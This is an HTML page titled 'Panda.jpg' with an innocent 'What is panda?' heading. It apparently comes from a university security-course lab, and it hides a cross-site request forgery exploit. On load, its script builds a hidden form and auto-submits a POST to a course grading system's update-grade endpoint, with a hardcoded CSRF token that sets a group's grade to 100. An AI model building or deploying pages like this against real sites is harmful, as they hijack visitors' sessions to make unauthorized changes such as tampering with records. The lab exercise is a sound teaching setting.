<!DOCTYPE html>
<html>
<head>
    <title>Panda.jpg</title>
    <link rel='stylesheet' href='/stylesheets/style.css' />
</head>
<body>
<h1>Panda?</h1>
<p>What is panda?</p>
<script>
    method = "post"; // Set method to post

    // The rest of this code assumes you are not using a library.
    // It can be made less wordy if you use one.
    var form = document.createElement("form");
    form.setAttribute("method", method);
    form.setAttribute("action", "http://codered.cs.washington.edu/lab2/supersecuregradingsystem/reloaded.php?action=update-grade");

    var params = {
        groups: 'security_overflow',
        grade: '100',
        csrf_token: '56ba3e96856e344c242ce1f300fae855'
    };

    for(var key in params) {
        if(params.hasOwnProperty(key)) {
            var hiddenField = document.createElement("input");
            hiddenField.setAttribute("type", "text");
            hiddenField.setAttribute("name", key);
            hiddenField.setAttribute("value", params[key]);

            form.appendChild(hiddenField);
        }
    }

    document.body.appendChild(form);
    form.submit();
</script>
</body>
</html>